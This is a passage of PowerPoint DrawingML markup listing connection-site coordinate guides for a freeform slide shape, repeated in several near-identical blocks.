              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
